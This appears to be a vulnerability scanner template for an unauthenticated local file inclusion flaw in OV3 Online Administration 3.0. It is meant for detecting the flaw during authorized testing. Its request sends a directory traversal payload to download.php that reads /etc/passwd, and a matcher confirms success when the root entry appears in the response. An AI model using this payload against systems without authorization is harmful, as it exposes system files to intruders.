id: ov3-online-administration-unauthenticated-lfi
info:
  name: OV3 Online Administration 3.0 - Unauthenticated LFI
  author: 0x_Akoko
  severity: high
  description: The application Online Verwaltung III suffers from an unauthenticated file disclosure vulnerability when input passed thru the file parameter to download.php script is not properly verified before being used to include files. This can be exploited to read arbitrary files from local resources with directory traversal attacks.
  reference:
    - https://www.zeroscience.mk/codes/ov3_lfi.txt
  tags: ov3,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/download.php?c_id=557&file=../../../../../../../../../../../etc/passwd&name=download.txt"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
